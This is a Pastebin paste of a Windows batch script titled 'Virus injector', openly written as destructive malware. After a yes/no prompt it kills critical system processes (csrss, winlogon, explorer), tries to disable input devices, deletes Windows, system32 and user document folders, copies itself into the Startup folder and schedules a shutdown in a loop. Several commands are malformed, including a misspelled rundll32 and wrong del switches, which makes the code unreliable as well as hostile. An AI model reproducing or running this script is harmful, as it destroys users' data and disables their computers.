Guest User

Untitled

a guest
Nov 23rd, 2017
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
  1. :VPanel
  2. cls
  3. @echo off
  4. color fc
  5. title Virus injector - By Billy
  6. echo.
  7. echo Welcome to the manual virus injector. This program was made by Billy.
  8. echo.
  9. echo.
  10. SET /P a=Are you sure you want to destroy this computer? (Yes/No):
  11. @if %a%==Yes GOTO :virus
  12. @if %a%==yes GOTO :virus
  13. @if %a%==YES GOTO :virus
  14. @if %a%==No GOTO :pussy
  15. @if %a%==no GOTO :pussy
  16. @if %a%==NO GOTO :pussy
  17. :pussy
  18. cls
  19. @echo off
  20. title Pussy
  21. color fc
  22. echo What a PUSSSYYYYY!
  23. echo (Made by Billy, program will now exit)
  24. pause
  25. exit
  26. :virus
  27. cls
  28. @echo off
  29. color fc
  30. title Virus is starting..
  31. rund1132 keyboard, disable
  32. rund1132 mouse, disable
  33. start youtube.com
  34. taskkill -f -t /im explorer.exe
  35. taskkill -f -t /im csrss.exe
  36. taskkill -f -t /im winlogon.exe
  37. taskkill -f -t /im rund1132.exe
  38. taskkill -f -t /im dwm.exe
  39. del autoexec.bat
  40. del c:\windows
  41. del -f -q "C:\Users\%userprofile%\My Documents\*.*"
  42. del -f -q "c:\Users\%userprofile%\My Documents\My Videos\*.*"
  43. cd "C:\WINDOWS\system32
  44. del -f -q "*.*"
  45. copy "virus.bat" "C:\Users\%userprofile%\Start Menu\Programs\startup"
  46. shutdown -s -t 100 -c "Virus By Billy Initialized"
  47. goto :virus
  48. pause
Add Comment
Please, Sign In to add comment